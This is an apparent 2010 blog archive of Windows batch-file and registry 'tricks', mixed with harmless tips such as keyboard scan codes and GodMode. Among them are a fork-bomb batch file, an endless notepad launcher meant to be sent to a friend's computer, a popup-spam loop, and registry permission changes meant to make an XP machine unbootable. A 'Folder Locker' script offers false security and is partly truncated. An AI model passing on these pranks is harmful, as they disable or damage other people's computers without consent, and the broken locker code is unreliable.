Archive for 2010
Type the given code in Notepad….
@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Save it as matrix.bat
Do you know how to make a folder without a name? is it possible? oh yea it is possible. just try it out..
1. clcik the folder.. right click on it..then click rename...and delte the old name
2. then pressing ALT button from num pad of your keyboard and type 0160 after that press enter.
important think to notice :(you have to type by pressing the ALT button ..don't stop pressing and while you will type 0160 it will not appear..u will continue typing and press enter.. thats it)
Copy the code given below in notepad :-
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
and save it with .bat extension
Ordinarily when you type in a search query in Google search, you press the search button, and Google returns a list of multiple Web sites matching your search query. The I’m Feeling Lucky button skips the search results page and goes directly to the first ranked page for that search query.
But some time I’m Feeling Lucky button gives you funny output for some search queries….
•Google 133t
•Google loco
•Google gothic
•Google bsd
•Google linux
•Google easter egg
•Google cheese
•ewmew fudd
•xx-Klingon
•xx-piglatin
•Search
•Find Chuck Norris
Just copy the below code and paste it to your web browser address bar and press enter..
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save the file with any file name but with .bat as extension
This is a real funny note pad trick. It is harmless.....
open note pad and type
:s
start 0%
goto :s
and save it with .bat extension.....
Copy the code given below in notepad :- @echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
Read More....
To Open Notepad continuously in your friend’s computer:
Type the code in notepad as :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.
You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart yahoo messenger and try Multiple Login
1- Private Character Editor
This program is for designing icons and Characters(Alphapet )
Click :start
Then :run
type :EUDCEDIT
2- iExpress
This Program is for converting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress
3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr
4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32
5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32
This is the program....................
#include
void main()
{
if(printf("Hello Friends"))
{}
}
1. Open a blank Notepad file
2. Write .LOG as the first line of the file, followed by a enter. Save the file and close it.
3. Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.
4. Type your notes and then save and close the file.
After that open the file and see the changes.
by this trick u can also use ur notebook as a personal diary..
Honestly .. don't try these at college, if you get caught you may be charged and punished......
Anyways ....... if you log in to some admin account in XP, then open regedit, right click on HKEY_LOCAL_MACHINE , click Permissions, select SYSTEM and "deny" access.
repeat this for HKEY_USERS, next time the computer won't boot............
This may harm your computer So try this at your own risk.....................
Here are the various scan codes originally defined by IBM (you can see from the layout these were defined for the very first keyboard)...
hex 01 = Escape key
hex 02 = 1 or ! key
hex 03 = 2 or @ key
hex 04 = 3 or # key
hex 05 = 4 or $ key
hex 06 = 5 or % key
hex 07 = 6 or ^ key
hex 08 = 7 or & key
hex 09 = 8 or * key
hex 0A = 9 or ( key
hex 0B = 0 or ) key
hex 0C = - or _ key
hex 0D = = or + key
hex 0E = Backspace key
hex 0F = Tab key
hex 10 = q or Q key
hex 11 = w or W key
hex 12 = e or E key
hex 13 = r or R key
hex 14 = t or T key
hex 15 = y or Y key
hex 16 = u or U key
hex 17 = i or I key
hex 18 = o or O key
hex 19 = p or P key
hex 1A = [ or { key
hex 1B = ] or } key
hex 1C = Enter key
hex 1D = Control key (Left if two)
hex 1E = a or A key
hex 1F = s or S key
hex 20 = d or D key
hex 21 = f or F key
hex 22 = g or G key
hex 23 = h or H key
hex 24 = j or J key
hex 25 = k or K key
hex 26 = l or L key
hex 27 = ; or : key
hex 28 = ' or " key
hex 29 = ` or ~ key
hex 2A = Left shift key
hex 2B = \ or | key
hex 2C = z or Z key
hex 2D = x or X key
hex 2E = c or C key
hex 2F = v or V key
hex 30 = b or B key
hex 31 = n or N key
hex 32 = m or M key
hex 33 = , or < key
hex 34 = . or > key
hex 35 = / or ? key
hex 36 = Right shift key
hex 37 = * or PrtScr key
hex 38 = Alt key (Left one if two)
hex 39 = Space bar
hex 3A = Caps Lock key
hex 3B = F1 key
hex 3C = F2 key
hex 3D = F3 key
hex 3E = F4 key
hex 3F = F5 key
hex 40 = F6 key
hex 41 = F7 key
hex 42 = F8 key
hex 43 = F9 key
hex 44 = F10 key
hex 45 = Num Lock key on numeric keypad
hex 46 = Scroll Lock key on numeric keypad
hex 47 = 7 or Home key on numeric keypad
hex 48 = 8 or Cursor Up key on numeric keypad
hex 49 = 9 or Pg Up key on numeric keypad
hex 4A = - key on numeric keypad
hex 4B = 4 or Cursor Left key on numeric keypad
hex 4C = 5 key on numeric keypad
hex 4D = 6 or Cursor Right key on numeric keypad
hex 4E = + key on numeric keypad
hex 4F = 1 or End key on numeric keypad
hex 50 = 2 or Cursor Down kay on numeric keypad
hex 51 = 3 or Pg Dn key on numeric keypad
hex 52 = 0 or Insert key on numeric keypad
hex 53 = . or Delete key on numeric keypad
hex 54 = Sys Req key (on 84-key keyboard)
hex 57 = F11
hex 58 = F12
hex E1 = Pause key (on 101-key keyboard)
The following scan codes are preceeded by hex E0...
hex 1C = Enter key on numeric keypad
hex 1D = Control (Right if two)
hex 35 = / key on numeric keypad
hex 38 = Alt (Right if two)
hex 47 = Home
hex 48 = Up arrow
hex 49 = Pg Up
hex 4B = Left arrow
hex 4D = Right arrow
hex 4F = End
hex 50 = Down arrow
hex 51 = Pg Dn
hex 52 = Insert
hex 53 = Delete
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==Type YOUR PASSWORD goto FAIL
echo Folder Unlocked successfully
goto END
:FAIL
echo Invalid password
goto END
:MDLOCKER
md Locker
echo Locker created successfully
goto END
:END
s
how to execute this.......Open a notepad copy and paste the above code and save it as anything.bat then click it.
now a new folder is created in the same directory named LOCKER copy and paste all your data whatever you want to lock into this folder
as you finish pasting now it's time to lock your folder
go to that anything.bat file double click it it will as you
want to lock this folder type Y OR N (Y for YES & N for NO)
Now your folder is locked
This option in Windows is commonly called "God mode" because it puts you in complete control in one place. I can go with that so here's how to create the GodMode folder.
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
OK, now that you've done that right click on an empty space on your Desktop and select New and then Folder from the context menu. When the folder opens and shows you the new folder name highlighted just press Control-V to paste the above name into the dialog for the folder name. Press enter and you're done.
Many current CD/DVD burning software support the bootable feature. If you already have your favorite burning software, look around to find the bootable option. For this article, I will use the steps and sample screen-shots with the burning tool called Nero.
To create a own message box please follow these step :-
If u want to crack windows password u have to follow these step
cls
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==Type YOUR PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End s
how to execute this.......
Open a notepad copy and paste the above code and save it as anything.bat then click it.
now a new folder is created in the same directory named LOCKER copy and paste all your data whatever you want to lock into this folder
as you finish pasting now it's time to lock your folder
go to that anything.bat file double click it it will as you
want to lock this folder type Y OR N (y for yes N for NO)
Now your folder is locked
To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish.

